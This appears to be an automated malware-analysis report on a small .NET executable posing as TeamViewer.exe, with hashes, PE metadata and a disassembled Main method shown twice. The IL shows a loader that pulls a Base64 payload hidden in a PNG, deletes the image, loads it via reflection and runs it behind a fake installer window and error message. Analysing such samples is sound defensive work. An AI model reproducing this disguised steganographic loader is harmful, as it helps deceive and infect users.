Suspicious
Suspect

1aa5f4be0699a4ff2075245ac0fd7e28

PE Executable
|
MD5: 1aa5f4be0699a4ff2075245ac0fd7e28
|
Size: 10.75 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
1aa5f4be0699a4ff2075245ac0fd7e28
Sha1
efd9eb9df4ea17b1e0a91a75b44bff1d50383709
Sha256
fdf7a2b4d4b7d7429cf0d9fc3a0caf572d4137472dd5f12632a4ecf66caf215f
Sha384
77c50efb5d1ac23c96f421b6e06d7722f691b2a5bc6cd6b821a162a4051540f6911ca229b73f9fcea9070c076005b703
Sha512
8425432738194d93b5e9f147a8685e3accffcb23f3dc51610d3025c06f92f07606314e480cdb37e2848866f3fd660db048f6c944a609d8981b2227128b7feed8
SSDeep
96:7WIzlAQeccrpXFFjxmL4Gp+XE1Og71RZWz8tvYcx+mCqOVp2XndY3WNtZ:7zzTetFjc+XHc1Tk81YcZOfKndY8
TLSH
D4220915A7D48235E9BB6F39BC72724007B1BA02DD27EF6E1EC2905F5D632108972BA1

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
1aa5f4be0699a4ff2075245ac0fd7e28
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ConsoleApp1.Properties.Resources.resources
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

PDB Path: C:\Users\Work\source\repos\test2025\ConsoleApp1\obj\Debug\TeamViewer.pdb
Module Name

TeamViewer.exe
Full Name

TeamViewer.exe
EntryPoint

System.Void etomoe::Main()
Scope Name

TeamViewer.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

TeamViewer
Assembly Version

3.1.123.1
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8.1
Total Strings

14
Main Method

System.Void etomoe::Main()
Main IL Instruction Count

171
Main IL

newobj System.Void etomoe/<>c__DisplayClass0_0::.ctor() stloc.0 <null> nop <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_BaseDirectory() stloc.1 <null> ldloc.1 <null> ldstr *.png call System.String[] System.IO.Directory::GetFiles(System.String,System.String) ldc.i4.0 <null> ldelem.ref <null> stloc.2 <null> ldloc.2 <null> call System.Byte[] etomoe::ExtractDataFromImage(System.String) stloc.3 <null> ldloc.2 <null> call System.Void etomoe::DeleteImageFile(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.3 <null> callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.Byte[] System.Convert::FromBase64String(System.String) call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.s V_4 ldloc.s V_4 ldstr ConsoleApp2.Program callvirt System.Type System.Reflection.Assembly::GetType(System.String) stloc.s V_5 ldloc.0 <null> ldloc.s V_5 ldstr Main callvirt System.Reflection.MethodInfo System.Type::GetMethod(System.String) stfld System.Reflection.MethodInfo etomoe/<>c__DisplayClass0_0::method ldloc.0 <null> newobj System.Void System.Windows.Forms.Form::.ctor() dup <null> ldstr Installing callvirt System.Void System.Windows.Forms.Control::set_Text(System.String) nop <null> dup <null> ldc.i4 400 ldc.i4 150 newobj System.Void System.Drawing.Size::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Form::set_Size(System.Drawing.Size) nop <null> dup <null> ldc.i4.1 <null> callvirt System.Void System.Windows.Forms.Form::set_StartPosition(System.Windows.Forms.FormStartPosition) nop <null> dup <null> ldc.i4.3 <null> callvirt System.Void System.Windows.Forms.Form::set_FormBorderStyle(System.Windows.Forms.FormBorderStyle) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_MaximizeBox(System.Boolean) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_MinimizeBox(System.Boolean) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_ControlBox(System.Boolean) nop <null> stfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldc.i4.0 <null> stfld System.Boolean etomoe/<>c__DisplayClass0_0::allowClose ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldftn System.Void etomoe/<>c__DisplayClass0_0::<Main>b__0(System.Object,System.Windows.Forms.FormClosingEventArgs) newobj System.Void System.Windows.Forms.FormClosingEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Form::add_FormClosing(System.Windows.Forms.FormClosingEventHandler) nop <null> newobj System.Void System.Windows.Forms.Label::.ctor() dup <null> ldstr Loading.... callvirt System.Void System.Windows.Forms.Control::set_Text(System.String) nop <null> dup <null> ldc.i4.1 <null> callvirt System.Void System.Windows.Forms.Control::set_AutoSize(System.Boolean) nop <null> dup <null> ldc.i4.s 10 ldc.i4.s 10 newobj System.Void System.Drawing.Point::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Control::set_Location(System.Drawing.Point) nop <null> stloc.s V_6 ldloc.0 <null> newobj System.Void System.Windows.Forms.ProgressBar::.ctor() dup <null> ldc.i4.s 10 ldc.i4.s 40 newobj System.Void System.Drawing.Point::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Control::set_Location(System.Drawing.Point) nop <null> dup <null> ldc.i4.s 20 callvirt System.Void System.Windows.Forms.Control::set_Height(System.Int32) nop <null> dup <null> ldc.i4.s 100 callvirt System.Void System.Windows.Forms.ProgressBar::set_Maximum(System.Int32) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.ProgressBar::set_Value(System.Int32) nop <null> stfld System.Windows.Forms.ProgressBar etomoe/<>c__DisplayClass0_0::pb ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.Control/ControlCollection System.Windows.Forms.Control::get_Controls() ldloc.s V_6 callvirt System.Void System.Windows.Forms.Control/ControlCollection::Add(System.Windows.Forms.Control) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.Control/ControlCollection System.Windows.Forms.Control::get_Controls() ldloc.0 <null> ldfld System.Windows.Forms.ProgressBar etomoe/<>c__DisplayClass0_0::pb callvirt System.Void System.Windows.Forms.Control/ControlCollection::Add(System.Windows.Forms.Control) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.ProgressBar etomoe/<>c__DisplayClass0_0::pb ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm callvirt System.Drawing.Size System.Windows.Forms.Form::get_ClientSize() stloc.s V_7 ldloca.s V_7 call System.Int32 System.Drawing.Size::get_Width() ldc.i4.s 20 sub <null> callvirt System.Void System.Windows.Forms.Control::set_Width(System.Int32) nop <null> ldloc.0 <null> newobj System.Void System.Windows.Forms.Timer::.ctor() dup <null> ldc.i4.s 122 callvirt System.Void System.Windows.Forms.Timer::set_Interval(System.Int32) nop <null> stfld System.Windows.Forms.Timer etomoe/<>c__DisplayClass0_0::timer ldloc.0 <null> ldc.i4.0 <null> stfld System.Int32 etomoe/<>c__DisplayClass0_0::prog ldloc.0 <null> ldfld System.Windows.Forms.Timer etomoe/<>c__DisplayClass0_0::timer ldloc.0 <null> ldftn System.Void etomoe/<>c__DisplayClass0_0::<Main>b__1(System.Object,System.EventArgs) newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Timer::add_Tick(System.EventHandler) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldftn System.Void etomoe/<>c__DisplayClass0_0::<Main>b__2(System.Object,System.EventArgs) newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Form::add_Shown(System.EventHandler) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.DialogResult System.Windows.Forms.Form::ShowDialog() pop <null> ldstr Sorry, this program cannot be installed. ldstr Error call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String) pop <null> ret <null>
Module Name

TeamViewer.exe
Full Name

TeamViewer.exe
EntryPoint

System.Void etomoe::Main()
Scope Name

TeamViewer.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

TeamViewer
Assembly Version

3.1.123.1
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.8.1
Total Strings

14
Main Method

System.Void etomoe::Main()
Main IL Instruction Count

171
Main IL

newobj System.Void etomoe/<>c__DisplayClass0_0::.ctor() stloc.0 <null> nop <null> call System.AppDomain System.AppDomain::get_CurrentDomain() callvirt System.String System.AppDomain::get_BaseDirectory() stloc.1 <null> ldloc.1 <null> ldstr *.png call System.String[] System.IO.Directory::GetFiles(System.String,System.String) ldc.i4.0 <null> ldelem.ref <null> stloc.2 <null> ldloc.2 <null> call System.Byte[] etomoe::ExtractDataFromImage(System.String) stloc.3 <null> ldloc.2 <null> call System.Void etomoe::DeleteImageFile(System.String) nop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.3 <null> callvirt System.String System.Text.Encoding::GetString(System.Byte[]) call System.Byte[] System.Convert::FromBase64String(System.String) call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.s V_4 ldloc.s V_4 ldstr ConsoleApp2.Program callvirt System.Type System.Reflection.Assembly::GetType(System.String) stloc.s V_5 ldloc.0 <null> ldloc.s V_5 ldstr Main callvirt System.Reflection.MethodInfo System.Type::GetMethod(System.String) stfld System.Reflection.MethodInfo etomoe/<>c__DisplayClass0_0::method ldloc.0 <null> newobj System.Void System.Windows.Forms.Form::.ctor() dup <null> ldstr Installing callvirt System.Void System.Windows.Forms.Control::set_Text(System.String) nop <null> dup <null> ldc.i4 400 ldc.i4 150 newobj System.Void System.Drawing.Size::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Form::set_Size(System.Drawing.Size) nop <null> dup <null> ldc.i4.1 <null> callvirt System.Void System.Windows.Forms.Form::set_StartPosition(System.Windows.Forms.FormStartPosition) nop <null> dup <null> ldc.i4.3 <null> callvirt System.Void System.Windows.Forms.Form::set_FormBorderStyle(System.Windows.Forms.FormBorderStyle) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_MaximizeBox(System.Boolean) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_MinimizeBox(System.Boolean) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.Form::set_ControlBox(System.Boolean) nop <null> stfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldc.i4.0 <null> stfld System.Boolean etomoe/<>c__DisplayClass0_0::allowClose ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldftn System.Void etomoe/<>c__DisplayClass0_0::<Main>b__0(System.Object,System.Windows.Forms.FormClosingEventArgs) newobj System.Void System.Windows.Forms.FormClosingEventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Form::add_FormClosing(System.Windows.Forms.FormClosingEventHandler) nop <null> newobj System.Void System.Windows.Forms.Label::.ctor() dup <null> ldstr Loading.... callvirt System.Void System.Windows.Forms.Control::set_Text(System.String) nop <null> dup <null> ldc.i4.1 <null> callvirt System.Void System.Windows.Forms.Control::set_AutoSize(System.Boolean) nop <null> dup <null> ldc.i4.s 10 ldc.i4.s 10 newobj System.Void System.Drawing.Point::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Control::set_Location(System.Drawing.Point) nop <null> stloc.s V_6 ldloc.0 <null> newobj System.Void System.Windows.Forms.ProgressBar::.ctor() dup <null> ldc.i4.s 10 ldc.i4.s 40 newobj System.Void System.Drawing.Point::.ctor(System.Int32,System.Int32) callvirt System.Void System.Windows.Forms.Control::set_Location(System.Drawing.Point) nop <null> dup <null> ldc.i4.s 20 callvirt System.Void System.Windows.Forms.Control::set_Height(System.Int32) nop <null> dup <null> ldc.i4.s 100 callvirt System.Void System.Windows.Forms.ProgressBar::set_Maximum(System.Int32) nop <null> dup <null> ldc.i4.0 <null> callvirt System.Void System.Windows.Forms.ProgressBar::set_Value(System.Int32) nop <null> stfld System.Windows.Forms.ProgressBar etomoe/<>c__DisplayClass0_0::pb ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.Control/ControlCollection System.Windows.Forms.Control::get_Controls() ldloc.s V_6 callvirt System.Void System.Windows.Forms.Control/ControlCollection::Add(System.Windows.Forms.Control) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.Control/ControlCollection System.Windows.Forms.Control::get_Controls() ldloc.0 <null> ldfld System.Windows.Forms.ProgressBar etomoe/<>c__DisplayClass0_0::pb callvirt System.Void System.Windows.Forms.Control/ControlCollection::Add(System.Windows.Forms.Control) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.ProgressBar etomoe/<>c__DisplayClass0_0::pb ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm callvirt System.Drawing.Size System.Windows.Forms.Form::get_ClientSize() stloc.s V_7 ldloca.s V_7 call System.Int32 System.Drawing.Size::get_Width() ldc.i4.s 20 sub <null> callvirt System.Void System.Windows.Forms.Control::set_Width(System.Int32) nop <null> ldloc.0 <null> newobj System.Void System.Windows.Forms.Timer::.ctor() dup <null> ldc.i4.s 122 callvirt System.Void System.Windows.Forms.Timer::set_Interval(System.Int32) nop <null> stfld System.Windows.Forms.Timer etomoe/<>c__DisplayClass0_0::timer ldloc.0 <null> ldc.i4.0 <null> stfld System.Int32 etomoe/<>c__DisplayClass0_0::prog ldloc.0 <null> ldfld System.Windows.Forms.Timer etomoe/<>c__DisplayClass0_0::timer ldloc.0 <null> ldftn System.Void etomoe/<>c__DisplayClass0_0::<Main>b__1(System.Object,System.EventArgs) newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Timer::add_Tick(System.EventHandler) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm ldloc.0 <null> ldftn System.Void etomoe/<>c__DisplayClass0_0::<Main>b__2(System.Object,System.EventArgs) newobj System.Void System.EventHandler::.ctor(System.Object,System.IntPtr) callvirt System.Void System.Windows.Forms.Form::add_Shown(System.EventHandler) nop <null> ldloc.0 <null> ldfld System.Windows.Forms.Form etomoe/<>c__DisplayClass0_0::loadingForm callvirt System.Windows.Forms.DialogResult System.Windows.Forms.Form::ShowDialog() pop <null> ldstr Sorry, this program cannot be installed. ldstr Error call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String) pop <null> ret <null>
1aa5f4be0699a4ff2075245ac0fd7e28 (10.75 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙